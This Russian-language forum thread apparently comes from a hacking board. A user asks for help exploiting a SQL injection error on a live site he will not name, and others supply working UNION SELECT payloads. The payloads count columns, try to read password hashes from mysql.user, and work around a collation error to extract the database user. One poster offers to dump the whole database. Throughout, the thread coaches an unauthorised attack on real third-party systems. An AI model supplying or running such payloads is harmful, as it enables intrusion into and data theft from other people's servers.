Ситуация такая...

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

Не раз сталкивался с подобными ошибками...
Расплывчато представляю то, как использовать подобную ошибку...
Не могли бы Вы рассказать...что да как...
И если можно с примером...

Скуль конкретный! Дай ссылку баги... я что нить попробую.!.!.!.!

Попробуй без кавычки, потом попробуй например id=(или чё там) несуществующее 777777777777

Скуль конкретный! Дай ссылку баги... я что нить попробую.!.!.!.!

Ссори, ссылку дать никак не могу...
Проект очень и очень серьезный, не хотелось бы, чтоб его напрочь снесли...В общем светить ссылку ну никак не могу...

to Azazel

Что-то вроде 77777777 вводил...выводил, что мол запись просто не найдена...
Данная ошибка, которую я описал в первом посте как я понял реагирует только тогда, когда id='
Ничего другого, именно '...
Вводил все что можно...
Какие еще будут предложения?

id=9999999+union+select+null,null,null/*
id=9999999+union+select+1,2,3/*
Подбираешь цифры пока не ищезнет сообщение
The used SELECT statements have a different number of columns
Потом можно будет доставать данные с базы

И вобще прежде чем задавать такие вопросы юзай поиск по сайту! Про sql-injection написано достаточно...

Я всегда прежде чем задавать какие-то там либо вопросы обращаюсь к поиску...
Да, по поводу sql-injection написано даже придостачно...согласен...
Далеко не все понимал, когда читал например статью отсюда - _http://forum.antichat.ru/thread19844.html
Посему решил на реальном примере разобраться...прошу зла на меня держать, ежели посчитаете эту тему вовсе нубской ;)
Подобрал цифры...сообщение исчезло...
Каким образом можно достать данные с базы? Мне ведь как я понимаю нужно знать названия столбцов...как делать, не знаю...
Прошу помочь...

id='+union+select+1,2,3,4,5,6,7/*

Постепенно начинаю понимать:

при запросе id='+union+select+1,2,3,4,5,6,7+from+users/* выдает - Table 'cj**.users' doesn't exist
при запросе id='+union+select+1,2,3,4,5,6,7,mysql.user.passwor d,null+from+mysql.user/* - Access denied for user 'pank***'@'217.23.133.***' to database 'mysql'
про запросе id='+union+select+null,null,null,null,VERSION(),nu ll,null/* выдает - Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
Что мне это все дает?
И как правильно составить все-таки запрос?

id='+union+select+null,null,null,null,AES_DECRYPT( AES_ENCRYPT(USER(),0x71),0x71),null,null/
Кодирова не та просто.

Ввел так, ничего нового не узнал - 01.01.1970 pank***@217.23.133.***
Каким образом можно попытаться достать нужную мне информацию из БД?

Стукни в асю могу снять базу.

вот такая проблема:

есть сайт с sql инъекцией, когда я подбираю правильное количество полей скрипт выводит страницу но без инфы в базе вот, так как её можно вытащить из бызы.
пхпинфо:
register_globals Off
magic_quotes_gpc On
magic_quotes_runtime Off
magic_quotes_sybase Off